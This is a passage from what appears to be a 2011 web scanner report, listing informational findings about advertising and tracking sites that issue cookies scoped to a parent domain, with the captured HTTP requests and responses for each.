GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303742441_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562769; uid=1_1303742441_1303179323923:6792170478871670; kwd=1_1303742441_11317:0_11717:0_11718:0_11719:0; sit=1_1303742441_719:0:0_2451:50869:45769_3236:208832:208714_782:563118:562769; cre=1_1303742441; bpd=1_1303742441; apd=1_1303742441; scg=1_1303742441; ppd=1_1303742441; afl=1_1303742441

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 14:41:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
16.37. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=627389121;fpan=1;fpa=P0-962486039-1303741255035;ns=1;url=http%3A%2F%2Fgoods.adnectar.com%2Fstatic%2Fquantcast_1.html;ref=http%3A%2F%2Fwww.livejournal.com%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303741255031;tzo=300;a=p-42U4PptTYmdC- HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://goods.adnectar.com/static/quantcast_1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EGUAFu8kjVmtjIMLyxuBATcBzAaBsQDe0kyka4WR_4JMMMhgggv-JgLbZ6Qw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1160808&id=736181&id=961753&id=688926&id=1160806&id=1057233&id=1127643&id=1206656&t=2
Set-Cookie: d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Sun, 24-Jul-2011 14:34:49 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

16.38. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=2939|1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C2%2C%2C

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
16.39. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /dynamic_preroll_playlist.fmil

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=480&height=360&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:58 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA30AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:53:58 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21629
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_8AKTzxy2lLx8IW; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:53:58 GMT; Path=/
Content-Type: application/smil
Content-Length: 3099
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="480" height="360" ba
...[SNIP]...
16.40. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif?replay_count=0&volume=100 HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; ymdt=0rO0ABXcSAAAEugAAA10AAQAAAOi7eGFI; ymvw=173_193_214_243_18R1PA3QCjJVp0

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:54:01 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_0_232
Set-Cookie: ymf=0rO0ABXcFAadrgwA*; Domain=.yumenetworks.com; Expires=Tue, 24-May-2011 14:54:01 GMT; Path=/
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
Location: http://ad.doubleclick.net/imp;v1;f;238884748;0-0;0;61850871;1|1;41734709|41752496|1;;cs=o;%3fhttp://ad.doubleclick.net/dot.gif?1303743241655
Content-Length: 0
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: image/gif

16.41. http://pogoda.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pogoda.webalta.ru
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>............ ...
...[SNIP]...
16.42. http://r2.mail.ru/b12179277.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179277.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179277.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:49 GMT
Content-Type: image/gif
Content-Length: 258
Connection: keep-alive
Set-Cookie: p=pPUGAEqlaAAA; expires=Wed, 24-Apr-13 14:20:49 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:20:49 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a..!...............................................................................................................................................................................................
...[SNIP]...
16.43. http://r2.mail.ru/b12179279.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179279.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179279.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 294
Connection: keep-alive
Set-Cookie: p=6ooGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a{.......................8..P.....I..$..A...............!.......,....{......0.I..8.....!.di.h..l.....tm.x..|..@.DA,....r.l:...BR.Z...v..z.... .....z.n....|>.$...~.........    .......................
...[SNIP]...
16.44. http://r2.mail.ru/b12179280.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179280.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179280.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 70
Connection: keep-alive
Set-Cookie: p=t9UGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a...................!.......,.............#....D-..,.i^'T....R..;
16.45. http://r2.mail.ru/b12201458.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12201458.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12201458.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 1232
Connection: keep-alive
Set-Cookie: p=19oGAErbVQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR............e.t.....tEXtSoftware.Adobe ImageReadyq.e<...diTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
16.46. http://r2.mail.ru/b12526055.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526055.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526055.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/gif
Content-Length: 122
Connection: keep-alive
Set-Cookie: p=nt4GAFHdKwAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...K.....\.r.J...J.y.8...............49.............n..3V.>..i.Z....k...m..2...;
16.47. http://r2.mail.ru/b12526056.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526056.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526056.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3722
Connection: keep-alive
Set-Cookie: p=EuwGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.4..
...[SNIP]...
16.48. http://r2.mail.ru/b12526057.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526057.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526057.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2843
Connection: keep-alive
Set-Cookie: p=gNkGAEnndQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...
16.49. http://r2.mail.ru/b12526058.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526058.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526058.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3343
Connection: keep-alive
Set-Cookie: p=lfUGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.0..
...[SNIP]...
16.50. http://r2.mail.ru/b12526059.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526059.jpg

Issue detail

